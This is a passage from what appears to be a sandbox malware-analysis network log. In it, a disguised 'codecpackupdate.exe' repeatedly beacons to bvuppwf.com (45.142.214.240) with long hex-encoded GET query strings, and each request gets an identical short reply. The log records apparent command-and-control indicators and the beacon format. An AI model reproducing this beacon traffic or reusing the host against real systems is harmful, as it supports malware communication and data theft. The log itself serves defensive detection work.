Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49763 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:17.561358929 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:17.862667084 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49764 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:18.201076984 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:18.507728100 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49765 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:18.842102051 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:19.143948078 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49766 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:19.483683109 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:19.782752991 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49767 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:20.124058962 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:20.427427053 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49768 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:20.762171030 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:21.058628082 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49769 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:21.394081116 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:21.699054003 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49770 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:22.033828974 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:22.338841915 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49771 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:22.684058905 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:22.981014013 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:23.090769053 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:23.392504930 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49772 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:23.732156038 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:24.030029058 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:24.138039112 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:24.440438032 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49773 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:24.777762890 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:25.074517965 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:25.184508085 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:25.488177061 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49774 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:25.828412056 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:26.128143072 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49775 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:26.471385002 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:26.782794952 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49776 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:27.122910023 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:27.429785967 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49777 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:27.762065887 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:28.060153961 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:28.169307947 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:28.470686913 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49778 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:28.814022064 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:29.115170956 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49779 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:29.458061934 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:29.758946896 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49780 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:30.093137980 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:30.406164885 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:30.512532949 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:30.812120914 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:30.918915987 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:31.226247072 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49781 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:31.562211037 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:31.860681057 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49782 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:32.211512089 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:32.516931057 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49783 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:32.856144905 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
